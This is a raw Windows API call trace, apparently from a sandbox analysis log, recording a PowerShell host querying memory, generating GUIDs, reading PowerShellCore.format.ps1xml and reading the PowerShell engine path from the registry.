	[0321.579] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.579] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x15e02885, Data2=0x1e5, Data3=0x4bfe, Data4=([0]=0xb9, [1]=0xb6, [2]=0x24, [3]=0x48, [4]=0x25, [5]=0x96, [6]=0x24, [7]=0x8a))) returned 0x0
	[0321.579] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.580] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.580] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.580] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.580] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.580] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.580] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.580] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.581] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.581] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.581] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.581] VirtualQuery (in: lpAddress=0x1cb920, lpBuffer=0x1cc7e0, dwLength=0x30 | out: lpBuffer=0x1cc7e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.581] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0321.581] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.050] VirtualQuery (in: lpAddress=0x1cbc50, lpBuffer=0x1ccb10, dwLength=0x30 | out: lpBuffer=0x1ccb10*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.050] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.050] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x45053d29, Data2=0x9df0, Data3=0x49a7, Data4=([0]=0x94, [1]=0x71, [2]=0xfe, [3]=0xad, [4]=0xee, [5]=0x15, [6]=0xbc, [7]=0xd3))) returned 0x0
	[0322.050] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x2126f151, Data2=0xa6b2, Data3=0x454d, Data4=([0]=0xb0, [1]=0x9f, [2]=0x49, [3]=0x6, [4]=0xbb, [5]=0x2b, [6]=0x96, [7]=0x19))) returned 0x0
	[0322.051] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xea7be041, Data2=0xc40c, Data3=0x4616, Data4=([0]=0xa0, [1]=0x93, [2]=0x76, [3]=0x74, [4]=0x68, [5]=0x64, [6]=0x57, [7]=0x1c))) returned 0x0
	[0322.051] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x5ea5acf2, Data2=0x54eb, Data3=0x438f, Data4=([0]=0xa8, [1]=0xb4, [2]=0x8b, [3]=0xbb, [4]=0xb9, [5]=0x37, [6]=0x26, [7]=0x90))) returned 0x0
	[0322.052] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xd6506f5b, Data2=0xf824, Data3=0x4bb8, Data4=([0]=0xa3, [1]=0x57, [2]=0x39, [3]=0x8a, [4]=0x2c, [5]=0x98, [6]=0xce, [7]=0x18))) returned 0x0
	[0322.052] VirtualQuery (in: lpAddress=0x1cba30, lpBuffer=0x1cc8f0, dwLength=0x30 | out: lpBuffer=0x1cc8f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.052] VirtualQuery (in: lpAddress=0x1cbac0, lpBuffer=0x1cc980, dwLength=0x30 | out: lpBuffer=0x1cc980*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.052] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xd37be2ea, Data2=0xf68f, Data3=0x437e, Data4=([0]=0x95, [1]=0x77, [2]=0x76, [3]=0x43, [4]=0x3c, [5]=0x59, [6]=0x72, [7]=0xe5))) returned 0x0
	[0322.052] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x8cbc32e4, Data2=0x4583, Data3=0x4041, Data4=([0]=0x9e, [1]=0xd, [2]=0x46, [3]=0x17, [4]=0x8a, [5]=0x8b, [6]=0xf3, [7]=0x37))) returned 0x0
	[0322.053] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x1b8ba4a7, Data2=0x4988, Data3=0x419b, Data4=([0]=0xbe, [1]=0xd8, [2]=0x35, [3]=0x10, [4]=0x3b, [5]=0x63, [6]=0x5f, [7]=0x9))) returned 0x0
	[0322.053] SetErrorMode (uMode=0x1) returned 0x1
	[0322.053] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0322.053] GetFileType (hFile=0x32c) returned 0x1
	[0322.053] SetErrorMode (uMode=0x1) returned 0x1
	[0322.054] GetFileType (hFile=0x32c) returned 0x1
	[0322.054] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.055] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.055] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.055] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.055] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.055] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.056] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.056] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.056] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.057] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.057] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.057] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.058] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.058] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.059] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.059] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.059] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.061] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.061] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.061] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.061] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0322.062] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0xe67, lpOverlapped=0x0) returned 1
	[0322.062] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdca07, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdca07*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0322.062] ReadFile (in: hFile=0x32c, lpBuffer=0x2fdd438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x2fdd438*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0322.062] SetErrorMode (uMode=0x1) returned 0x1
	[0322.062] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd1c0 | out: lpFileInformation=0x1cd1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0322.063] SetErrorMode (uMode=0x1) returned 0x1
	[0322.063] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2a8 | out: phkResult=0x1cd2a8*=0x32c) returned 0x0
	[0322.063] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x56) returned 0x0
	[0322.063] CoTaskMemAlloc (cb=0x5a) returned 0x3d7030
	[0322.063] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x3d7030, lpcbData=0x1cd1f8*=0x56 | out: lpType=0x1cd1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd1f8*=0x56) returned 0x0
	[0322.063] CoTaskMemFree (pv=0x3d7030) 
	[0322.063] RegCloseKey (hKey=0x32c) returned 0x0
	[0322.064] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x420ae179, Data2=0x5931, Data3=0x4261, Data4=([0]=0xb5, [1]=0x6e, [2]=0x53, [3]=0xf4, [4]=0x78, [5]=0xca, [6]=0xa9, [7]=0xd7))) returned 0x0
	[0322.065] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa322ec09, Data2=0x6f19, Data3=0x4c27, Data4=([0]=0xa8, [1]=0x4b, [2]=0x7e, [3]=0x4b, [4]=0x3, [5]=0xb6, [6]=0xfb, [7]=0xd4))) returned 0x0
	[0322.065] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x741dbb74, Data2=0x5949, Data3=0x4f39, Data4=([0]=0x96, [1]=0xa7, [2]=0x6c, [3]=0xf8, [4]=0x48, [5]=0xab, [6]=0x42, [7]=0x36))) returned 0x0
	[0322.065] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xd5997172, Data2=0x3e03, Data3=0x4d6c, Data4=([0]=0xa4, [1]=0xd3, [2]=0xa4, [3]=0xd0, [4]=0x0, [5]=0xba, [6]=0x21, [7]=0xec))) returned 0x0
	[0322.065] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa6759abc, Data2=0x200d, Data3=0x46e5, Data4=([0]=0x89, [1]=0xf6, [2]=0x39, [3]=0x2f, [4]=0xd1, [5]=0xff, [6]=0x8b, [7]=0x62))) returned 0x0
	[0322.065] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x4f13b750, Data2=0x9458, Data3=0x4528, Data4=([0]=0xa2, [1]=0xa6, [2]=0x2b, [3]=0x22, [4]=0xef, [5]=0xc2, [6]=0xd3, [7]=0x35))) returned 0x0
	[0322.066] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xae11450, Data2=0xbbf8, Data3=0x4f4a, Data4=([0]=0xaf, [1]=0x1a, [2]=0xc0, [3]=0xee, [4]=0x9, [5]=0xcf, [6]=0xa2, [7]=0xca))) returned 0x0
	[0322.066] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.066] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x1adb27d8, Data2=0xa45d, Data3=0x4f24, Data4=([0]=0x8c, [1]=0x70, [2]=0x4e, [3]=0xb4, [4]=0xc5, [5]=0x55, [6]=0xcd, [7]=0x3b))) returned 0x0
	[0322.066] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x29b127b6, Data2=0x6977, Data3=0x49ee, Data4=([0]=0xb2, [1]=0x14, [2]=0x1a, [3]=0x10, [4]=0x72, [5]=0x7c, [6]=0xfa, [7]=0x55))) returned 0x0
	[0322.066] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa548609a, Data2=0xf101, Data3=0x41ae, Data4=([0]=0xbc, [1]=0xd8, [2]=0x52, [3]=0x1b, [4]=0xcd, [5]=0x5, [6]=0x18, [7]=0x4))) returned 0x0
	[0322.066] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x6bc8b7b0, Data2=0xd83f, Data3=0x4251, Data4=([0]=0xa9, [1]=0xe5, [2]=0x4b, [3]=0xf6, [4]=0xf0, [5]=0xb9, [6]=0x1a, [7]=0x80))) returned 0x0
	[0322.067] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc66eb387, Data2=0xc671, Data3=0x4c54, Data4=([0]=0x93, [1]=0x66, [2]=0x59, [3]=0x4c, [4]=0x87, [5]=0x38, [6]=0xeb, [7]=0xf1))) returned 0x0
	[0322.067] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xe0cbfd77, Data2=0x4a4d, Data3=0x4bf7, Data4=([0]=0x93, [1]=0xd0, [2]=0xfe, [3]=0x7, [4]=0x86, [5]=0x17, [6]=0x49, [7]=0x18))) returned 0x0
	[0322.067] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x43c41201, Data2=0xa1e6, Data3=0x4e8f, Data4=([0]=0xa4, [1]=0x94, [2]=0xc5, [3]=0x93, [4]=0xf8, [5]=0xec, [6]=0xbc, [7]=0x6a))) returned 0x0
	[0322.067] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa3c1b81c, Data2=0x601a, Data3=0x4343, Data4=([0]=0x82, [1]=0x99, [2]=0x6c, [3]=0x4c, [4]=0x63, [5]=0xf, [6]=0xc1, [7]=0x49))) returned 0x0
	[0322.067] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xf73ef97, Data2=0x58f, Data3=0x4630, Data4=([0]=0xa1, [1]=0x4a, [2]=0xa, [3]=0xab, [4]=0xdc, [5]=0x12, [6]=0x73, [7]=0xe6))) returned 0x0
	[0322.067] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xd71ad6bb, Data2=0x6bf, Data3=0x4595, Data4=([0]=0xb3, [1]=0x93, [2]=0x2f, [3]=0xd4, [4]=0x52, [5]=0x62, [6]=0x37, [7]=0xa9))) returned 0x0
	[0322.068] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x78de3da0, Data2=0xbb66, Data3=0x4584, Data4=([0]=0x93, [1]=0x6e, [2]=0x80, [3]=0xe5, [4]=0xc9, [5]=0x3e, [6]=0x2d, [7]=0xd1))) returned 0x0
	[0322.068] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x96a8a1c5, Data2=0x36cb, Data3=0x4979, Data4=([0]=0x96, [1]=0x13, [2]=0x4d, [3]=0x99, [4]=0xba, [5]=0x87, [6]=0x25, [7]=0x7f))) returned 0x0
	[0322.068] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.068] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.068] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0322.069] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xff07249c, Data2=0xd7ea, Data3=0x403a, Data4=([0]=0xa4, [1]=0x42, [2]=0x42, [3]=0x1c, [4]=0x9d, [5]=0x59, [6]=0xb8, [7]=0xba))) returned 0x0
	[0322.069] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xff72dba3, Data2=0x90a7, Data3=0x420a, Data4=([0]=0x9e, [1]=0x13, [2]=0x15, [3]=0xc, [4]=0x27, [5]=0x2a, [6]=0x46, [7]=0x3d))) returned 0x0
	[0322.069] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x45abe2ce, Data2=0xb2d5, Data3=0x4102, Data4=([0]=0xa2, [1]=0x1b, [2]=0xe4, [3]=0x5, [4]=0x74, [5]=0x17, [6]=0xa8, [7]=0xbc))) returned 0x0
	[0322.069] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x70dbde9c, Data2=0x7109, Data3=0x42cc, Data4=([0]=0x91, [1]=0xb8, [2]=0x4b, [3]=0x22, [4]=0xdb, [5]=0xac, [6]=0x4b, [7]=0xdd))) returned 0x0
	[0322.069] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x8c1442be, Data2=0xf52f, Data3=0x40a6, Data4=([0]=0x84, [1]=0xe2, [2]=0xdc, [3]=0x4e, [4]=0xa0, [5]=0x4d, [6]=0x11, [7]=0x66))) returned 0x0
	[0322.069] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x4864873a, Data2=0x54e8, Data3=0x41ce, Data4=([0]=0x8a, [1]=0x15, [2]=0xa1, [3]=0x7, [4]=0xc7, [5]=0xc3, [6]=0x23, [7]=0x59))) returned 0x0
	[0322.070] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc9263b1b, Data2=0xcef6, Data3=0x457a, Data4=([0]=0x85, [1]=0x79, [2]=0x86, [3]=0x5b, [4]=0xbe, [5]=0x20, [6]=0xb9, [7]=0x31))) returned 0x0
	[0322.070] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xd02ef1db, Data2=0xd28b, Data3=0x4a27, Data4=([0]=0xbc, [1]=0xbd, [2]=0x3a, [3]=0xf9, [4]=0x89, [5]=0xd7, [6]=0x94, [7]=0xeb))) returned 0x0
	[0322.070] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xb033e9e1, Data2=0x9cbc, Data3=0x42c3, Data4=([0]=0xad, [1]=0xc0, [2]=0xbb, [3]=0xa8, [4]=0x7b, [5]=0x5b, [6]=0xfe, [7]=0x31))) returned 0x0
